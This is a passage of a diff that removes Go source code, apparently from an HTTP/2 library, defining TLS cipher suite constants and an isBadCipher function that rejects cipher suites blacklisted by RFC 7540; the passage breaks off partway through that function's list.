0xC020 - cipher_TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA uint16 = 0xC021 - cipher_TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA uint16 = 0xC022 - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 uint16 = 0xC023 - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 uint16 = 0xC024 - cipher_TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 uint16 = 0xC025 - cipher_TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 uint16 = 0xC026 - cipher_TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 uint16 = 0xC027 - cipher_TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 uint16 = 0xC028 - cipher_TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 uint16 = 0xC029 - cipher_TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 uint16 = 0xC02A - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 uint16 = 0xC02B - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 uint16 = 0xC02C - cipher_TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 uint16 = 0xC02D - cipher_TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 uint16 = 0xC02E - cipher_TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 uint16 = 0xC02F - cipher_TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 uint16 = 0xC030 - cipher_TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 uint16 = 0xC031 - cipher_TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 uint16 = 0xC032 - cipher_TLS_ECDHE_PSK_WITH_RC4_128_SHA uint16 = 0xC033 - cipher_TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA uint16 = 0xC034 - cipher_TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA uint16 = 0xC035 - cipher_TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA uint16 = 0xC036 - cipher_TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256 uint16 = 0xC037 - cipher_TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384 uint16 = 0xC038 - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA uint16 = 0xC039 - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA256 uint16 = 0xC03A - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA384 uint16 = 0xC03B - cipher_TLS_RSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC03C - cipher_TLS_RSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC03D - cipher_TLS_DH_DSS_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC03E - cipher_TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC03F - cipher_TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC040 - cipher_TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC041 - cipher_TLS_DHE_DSS_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC042 - cipher_TLS_DHE_DSS_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC043 - cipher_TLS_DHE_RSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC044 - cipher_TLS_DHE_RSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC045 - cipher_TLS_DH_anon_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC046 - cipher_TLS_DH_anon_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC047 - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC048 - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC049 - cipher_TLS_ECDH_ECDSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC04A - cipher_TLS_ECDH_ECDSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC04B - cipher_TLS_ECDHE_RSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC04C - cipher_TLS_ECDHE_RSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC04D - cipher_TLS_ECDH_RSA_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC04E - cipher_TLS_ECDH_RSA_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC04F - cipher_TLS_RSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC050 - cipher_TLS_RSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC051 - cipher_TLS_DHE_RSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC052 - cipher_TLS_DHE_RSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC053 - cipher_TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC054 - cipher_TLS_DH_RSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC055 - cipher_TLS_DHE_DSS_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC056 - cipher_TLS_DHE_DSS_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC057 - cipher_TLS_DH_DSS_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC058 - cipher_TLS_DH_DSS_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC059 - 
cipher_TLS_DH_anon_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC05A - cipher_TLS_DH_anon_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC05B - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC05C - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC05D - cipher_TLS_ECDH_ECDSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC05E - cipher_TLS_ECDH_ECDSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC05F - cipher_TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC060 - cipher_TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC061 - cipher_TLS_ECDH_RSA_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC062 - cipher_TLS_ECDH_RSA_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC063 - cipher_TLS_PSK_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC064 - cipher_TLS_PSK_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC065 - cipher_TLS_DHE_PSK_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC066 - cipher_TLS_DHE_PSK_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC067 - cipher_TLS_RSA_PSK_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC068 - cipher_TLS_RSA_PSK_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC069 - cipher_TLS_PSK_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC06A - cipher_TLS_PSK_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC06B - cipher_TLS_DHE_PSK_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC06C - cipher_TLS_DHE_PSK_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC06D - cipher_TLS_RSA_PSK_WITH_ARIA_128_GCM_SHA256 uint16 = 0xC06E - cipher_TLS_RSA_PSK_WITH_ARIA_256_GCM_SHA384 uint16 = 0xC06F - cipher_TLS_ECDHE_PSK_WITH_ARIA_128_CBC_SHA256 uint16 = 0xC070 - cipher_TLS_ECDHE_PSK_WITH_ARIA_256_CBC_SHA384 uint16 = 0xC071 - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC072 - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC073 - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC074 - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC075 - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC076 - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC077 - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC078 - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC079 - cipher_TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC07A - cipher_TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC07B - cipher_TLS_DHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC07C - cipher_TLS_DHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC07D - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC07E - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC07F - cipher_TLS_DHE_DSS_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC080 - cipher_TLS_DHE_DSS_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC081 - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC082 - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC083 - cipher_TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC084 - cipher_TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC085 - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC086 - cipher_TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC087 - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC088 - cipher_TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC089 - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC08A - cipher_TLS_ECDHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC08B - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC08C - cipher_TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC08D - cipher_TLS_PSK_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC08E - cipher_TLS_PSK_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC08F - cipher_TLS_DHE_PSK_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 
0xC090 - cipher_TLS_DHE_PSK_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC091 - cipher_TLS_RSA_PSK_WITH_CAMELLIA_128_GCM_SHA256 uint16 = 0xC092 - cipher_TLS_RSA_PSK_WITH_CAMELLIA_256_GCM_SHA384 uint16 = 0xC093 - cipher_TLS_PSK_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC094 - cipher_TLS_PSK_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC095 - cipher_TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC096 - cipher_TLS_DHE_PSK_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC097 - cipher_TLS_RSA_PSK_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC098 - cipher_TLS_RSA_PSK_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC099 - cipher_TLS_ECDHE_PSK_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0xC09A - cipher_TLS_ECDHE_PSK_WITH_CAMELLIA_256_CBC_SHA384 uint16 = 0xC09B - cipher_TLS_RSA_WITH_AES_128_CCM uint16 = 0xC09C - cipher_TLS_RSA_WITH_AES_256_CCM uint16 = 0xC09D - cipher_TLS_DHE_RSA_WITH_AES_128_CCM uint16 = 0xC09E - cipher_TLS_DHE_RSA_WITH_AES_256_CCM uint16 = 0xC09F - cipher_TLS_RSA_WITH_AES_128_CCM_8 uint16 = 0xC0A0 - cipher_TLS_RSA_WITH_AES_256_CCM_8 uint16 = 0xC0A1 - cipher_TLS_DHE_RSA_WITH_AES_128_CCM_8 uint16 = 0xC0A2 - cipher_TLS_DHE_RSA_WITH_AES_256_CCM_8 uint16 = 0xC0A3 - cipher_TLS_PSK_WITH_AES_128_CCM uint16 = 0xC0A4 - cipher_TLS_PSK_WITH_AES_256_CCM uint16 = 0xC0A5 - cipher_TLS_DHE_PSK_WITH_AES_128_CCM uint16 = 0xC0A6 - cipher_TLS_DHE_PSK_WITH_AES_256_CCM uint16 = 0xC0A7 - cipher_TLS_PSK_WITH_AES_128_CCM_8 uint16 = 0xC0A8 - cipher_TLS_PSK_WITH_AES_256_CCM_8 uint16 = 0xC0A9 - cipher_TLS_PSK_DHE_WITH_AES_128_CCM_8 uint16 = 0xC0AA - cipher_TLS_PSK_DHE_WITH_AES_256_CCM_8 uint16 = 0xC0AB - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CCM uint16 = 0xC0AC - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CCM uint16 = 0xC0AD - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8 uint16 = 0xC0AE - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CCM_8 uint16 = 0xC0AF - // Unassigned uint16 = 0xC0B0-FF - // Unassigned uint16 = 0xC1-CB,* - // Unassigned uint16 = 0xCC00-A7 - cipher_TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCA8 - cipher_TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCA9 - cipher_TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCAA - cipher_TLS_PSK_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCAB - cipher_TLS_ECDHE_PSK_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCAC - cipher_TLS_DHE_PSK_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCAD - cipher_TLS_RSA_PSK_WITH_CHACHA20_POLY1305_SHA256 uint16 = 0xCCAE -) - -// isBadCipher reports whether the cipher is blacklisted by the HTTP/2 spec. -// References: -// https://tools.ietf.org/html/rfc7540#appendix-A -// Reject cipher suites from Appendix A. 
-// "This list includes those cipher suites that do not -// offer an ephemeral key exchange and those that are -// based on the TLS null, stream or block cipher type" -func isBadCipher(cipher uint16) bool { - switch cipher { - case cipher_TLS_NULL_WITH_NULL_NULL, - cipher_TLS_RSA_WITH_NULL_MD5, - cipher_TLS_RSA_WITH_NULL_SHA, - cipher_TLS_RSA_EXPORT_WITH_RC4_40_MD5, - cipher_TLS_RSA_WITH_RC4_128_MD5, - cipher_TLS_RSA_WITH_RC4_128_SHA, - cipher_TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5, - cipher_TLS_RSA_WITH_IDEA_CBC_SHA, - cipher_TLS_RSA_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_RSA_WITH_DES_CBC_SHA, - cipher_TLS_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_DH_DSS_WITH_DES_CBC_SHA, - cipher_TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_DH_RSA_WITH_DES_CBC_SHA, - cipher_TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_DES_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_DES_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DH_anon_EXPORT_WITH_RC4_40_MD5, - cipher_TLS_DH_anon_WITH_RC4_128_MD5, - cipher_TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA, - cipher_TLS_DH_anon_WITH_DES_CBC_SHA, - cipher_TLS_DH_anon_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_KRB5_WITH_DES_CBC_SHA, - cipher_TLS_KRB5_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_KRB5_WITH_RC4_128_SHA, - cipher_TLS_KRB5_WITH_IDEA_CBC_SHA, - cipher_TLS_KRB5_WITH_DES_CBC_MD5, - cipher_TLS_KRB5_WITH_3DES_EDE_CBC_MD5, - cipher_TLS_KRB5_WITH_RC4_128_MD5, - cipher_TLS_KRB5_WITH_IDEA_CBC_MD5, - cipher_TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA, - cipher_TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA, - cipher_TLS_KRB5_EXPORT_WITH_RC4_40_SHA, - cipher_TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5, - cipher_TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5, - cipher_TLS_KRB5_EXPORT_WITH_RC4_40_MD5, - cipher_TLS_PSK_WITH_NULL_SHA, - cipher_TLS_DHE_PSK_WITH_NULL_SHA, - cipher_TLS_RSA_PSK_WITH_NULL_SHA, - cipher_TLS_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_DH_DSS_WITH_AES_128_CBC_SHA, - cipher_TLS_DH_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_AES_128_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_DH_anon_WITH_AES_128_CBC_SHA, - cipher_TLS_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_DH_DSS_WITH_AES_256_CBC_SHA, - cipher_TLS_DH_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_AES_256_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_DH_anon_WITH_AES_256_CBC_SHA, - cipher_TLS_RSA_WITH_NULL_SHA256, - cipher_TLS_RSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_RSA_WITH_AES_256_CBC_SHA256, - cipher_TLS_DH_DSS_WITH_AES_128_CBC_SHA256, - cipher_TLS_DH_RSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_DHE_DSS_WITH_AES_128_CBC_SHA256, - cipher_TLS_RSA_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_DH_DSS_WITH_AES_256_CBC_SHA256, - cipher_TLS_DH_RSA_WITH_AES_256_CBC_SHA256, - cipher_TLS_DHE_DSS_WITH_AES_256_CBC_SHA256, - cipher_TLS_DHE_RSA_WITH_AES_256_CBC_SHA256, - cipher_TLS_DH_anon_WITH_AES_128_CBC_SHA256, - cipher_TLS_DH_anon_WITH_AES_256_CBC_SHA256, - cipher_TLS_RSA_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA, - 
cipher_TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA, - cipher_TLS_PSK_WITH_RC4_128_SHA, - cipher_TLS_PSK_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_PSK_WITH_AES_128_CBC_SHA, - cipher_TLS_PSK_WITH_AES_256_CBC_SHA, - cipher_TLS_DHE_PSK_WITH_RC4_128_SHA, - cipher_TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_DHE_PSK_WITH_AES_128_CBC_SHA, - cipher_TLS_DHE_PSK_WITH_AES_256_CBC_SHA, - cipher_TLS_RSA_PSK_WITH_RC4_128_SHA, - cipher_TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_RSA_PSK_WITH_AES_128_CBC_SHA, - cipher_TLS_RSA_PSK_WITH_AES_256_CBC_SHA, - cipher_TLS_RSA_WITH_SEED_CBC_SHA, - cipher_TLS_DH_DSS_WITH_SEED_CBC_SHA, - cipher_TLS_DH_RSA_WITH_SEED_CBC_SHA, - cipher_TLS_DHE_DSS_WITH_SEED_CBC_SHA, - cipher_TLS_DHE_RSA_WITH_SEED_CBC_SHA, - cipher_TLS_DH_anon_WITH_SEED_CBC_SHA, - cipher_TLS_RSA_WITH_AES_128_GCM_SHA256, - cipher_TLS_RSA_WITH_AES_256_GCM_SHA384, - cipher_TLS_DH_RSA_WITH_AES_128_GCM_SHA256, - cipher_TLS_DH_RSA_WITH_AES_256_GCM_SHA384, - cipher_TLS_DH_DSS_WITH_AES_128_GCM_SHA256, - cipher_TLS_DH_DSS_WITH_AES_256_GCM_SHA384, - cipher_TLS_DH_anon_WITH_AES_128_GCM_SHA256, - cipher_TLS_DH_anon_WITH_AES_256_GCM_SHA384, - cipher_TLS_PSK_WITH_AES_128_GCM_SHA256, - cipher_TLS_PSK_WITH_AES_256_GCM_SHA384, - cipher_TLS_RSA_PSK_WITH_AES_128_GCM_SHA256, - cipher_TLS_RSA_PSK_WITH_AES_256_GCM_SHA384, - cipher_TLS_PSK_WITH_AES_128_CBC_SHA256, - cipher_TLS_PSK_WITH_AES_256_CBC_SHA384, - cipher_TLS_PSK_WITH_NULL_SHA256, - cipher_TLS_PSK_WITH_NULL_SHA384, - cipher_TLS_DHE_PSK_WITH_AES_128_CBC_SHA256, - cipher_TLS_DHE_PSK_WITH_AES_256_CBC_SHA384, - cipher_TLS_DHE_PSK_WITH_NULL_SHA256, - cipher_TLS_DHE_PSK_WITH_NULL_SHA384, - cipher_TLS_RSA_PSK_WITH_AES_128_CBC_SHA256, - cipher_TLS_RSA_PSK_WITH_AES_256_CBC_SHA384, - cipher_TLS_RSA_PSK_WITH_NULL_SHA256, - cipher_TLS_RSA_PSK_WITH_NULL_SHA384, - cipher_TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256, - cipher_TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256, - cipher_TLS_EMPTY_RENEGOTIATION_INFO_SCSV, - cipher_TLS_ECDH_ECDSA_WITH_NULL_SHA, - cipher_TLS_ECDH_ECDSA_WITH_RC4_128_SHA, - cipher_TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_NULL_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_RC4_128_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDH_RSA_WITH_NULL_SHA, - cipher_TLS_ECDH_RSA_WITH_RC4_128_SHA, - cipher_TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDH_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDH_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDHE_RSA_WITH_NULL_SHA, - cipher_TLS_ECDHE_RSA_WITH_RC4_128_SHA, - cipher_TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDH_anon_WITH_NULL_SHA, - cipher_TLS_ECDH_anon_WITH_RC4_128_SHA, - cipher_TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA, - 
cipher_TLS_ECDH_anon_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDH_anon_WITH_AES_256_CBC_SHA, - cipher_TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_SRP_SHA_WITH_AES_128_CBC_SHA, - cipher_TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA, - cipher_TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA, - cipher_TLS_SRP_SHA_WITH_AES_256_CBC_SHA, - cipher_TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA, - cipher_TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384, - cipher_TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384, - cipher_TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256, - cipher_TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384, - cipher_TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256, - cipher_TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384, - cipher_TLS_ECDHE_PSK_WITH_RC4_128_SHA, - cipher_TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA, - cipher_TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA, - cipher_TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA, - cipher_TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256, - cipher_TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384, - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA, - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA256, - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA384, - cipher_TLS_RSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_RSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DH_DSS_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DHE_DSS_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DHE_DSS_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DHE_RSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DHE_RSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_DH_anon_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_DH_anon_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_ECDHE_ECDSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_ECDH_ECDSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_ECDH_ECDSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_ECDHE_RSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_ECDHE_RSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_ECDH_RSA_WITH_ARIA_128_CBC_SHA256, - cipher_TLS_ECDH_RSA_WITH_ARIA_256_CBC_SHA384, - cipher_TLS_RSA_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_RSA_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_DH_RSA_WITH_ARIA_256_GCM_SHA384, - cipher_TLS_DH_DSS_WITH_ARIA_128_GCM_SHA256, - cipher_TLS_DH_DSS_WITH_ARIA_256_GCM_SHA384, - 